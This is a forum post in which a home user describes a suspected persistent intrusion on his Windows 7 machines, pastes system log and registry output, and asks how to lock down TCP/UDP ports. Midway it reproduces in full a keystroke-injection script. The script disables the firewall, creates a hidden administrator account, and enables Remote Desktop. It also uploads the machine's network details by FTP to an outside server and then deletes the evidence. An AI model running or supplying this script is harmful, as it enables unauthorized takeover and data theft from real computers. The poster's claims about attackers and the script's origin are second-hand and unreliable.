I owned a internet service provider service for a number of years and in 1996 Some guys from Russia and China came calling with a brief appearance from a group in Sweden of all places. It was a 6 month battle. Short for a war, but after much grief on both sides I was able to remove the swine and cast them over the cliff's to their death. Yes it was a Windows NT Server farm and I had just started moving to Unix.
Now with just a couple XP and Win7 boxes I play around with things to attempt to keep my brain from, stagnating although my daughter says it is way to late to prevent that.
The issue is something got through many layers of firewalls, virus and malware programs. I thought I has cast it asunder at least 10 times now. However I0 minutes ago I see in my Monitor folder/drive changes. Windows Trusted Installer has determined .... and then a few seconds later a new NTDmini.DAT file is generated.
now after trying to log port sniffers and TCP-UDP end point and so on it is very hard to see anything when there are over 200 people hitting to your computer within a second or two. The only thing I have found that helps is to block 65,000+ ports and only leave 6 to 12 ports open.
The attackers latest attempt was from hidden IP addresses. 233.216.xxx,xxx and a non existent domain www.niser.org
ntdll.dll!RtlRegisterThreadWithCsrss+0x197 01A90000 01A8E000 00002000 7FFDD000 0025E414 0025E4BC -> 2015-03-24 11:12:57:072 2268 ef8 Misc = Module: C:\Windows\system32\ DETAIL - 7 user registry handles leaked from \Registry\User\S-1-5-21-3132887318-2642499473-540075541-1000: Process 1340 (\Device\HarddiskVolume2\Windows\System32\svchost.exe) has opened key \REGISTRY\USER\S-1-5-21-3132887318-2642499473-540075541-1000\Software HKLM\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations REG_MULTI_SZ \??\C:\Users\xxxxxx\AppData\Local\Temp\{74E401B6-9F16-4CCF-8559-B1A38CC7B5B7}\fpb.tmp;;\??\C:\Users\xxxxxxx1\AppData\Local\Temp\{74E401B6-9F16-4CCF-8559-B1A38CC7B5B7};;; 3/26/2015 6:32:16 PM 171
Anyway I am wondering how to stop all traffic other than traffic from a specific web page domain or require a ALLOW access to this content. I will kill this but want something to fight back with. There has to be a way to actually close a port and lock the darn door,
Example here that this is happening.
Target: Windows 7 Description: Script for turning off the firewall, adding a user, making it an administrator, enabling remote access and sending (by FTP) the IP number to a server of your choice, then deleting the file. DELAY 2000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING netsh firewall set opmode mode=disable ENTER DELAY 400 STRING ALT y ENTER DELAY 400 STRING net user /add username password ENTER DELAY 400 STRING net localgroup administrators username /add ENTER DELAY 400 STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f ENTER DELAY 400 STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f ENTER DELAY 400 STRING sc config TermService start= auto ENTER DELAY 400 STRING net start Termservice ENTER DELAY 400 STRING cd %USERPROFILE% ENTER DELAY 400 STRING ipconfig /all > number.txt ENTER DELAY 400 STRING ftp -i ftp server ENTER DELAY 400 STRING login name ENTER DELAY 400 STRING login password ENTER DELAY 600 STRING prompt ENTER DELAY 400 STRING prompt ENTER DELAY 400 STRING PUT number.txt ENTER DELAY 2000 STRING bye ENTER DELAY 400 STRING del number.txt ENTER DELAY 400 ALT SPACE STRING c
So sorry I know this is not anyone's problem. Unless it happens to you. The code posted if from a Gov admin that caught after it was posted to a forum. There was some kind of Stopping or disabling the BFE service in the top of the script (i did not receive that part). He did test it and was blown away because it worked and he gained access to another departments computers. *so i was told*
If there is something that can point me in the direction to restrict TCP/UDP i would be grateful.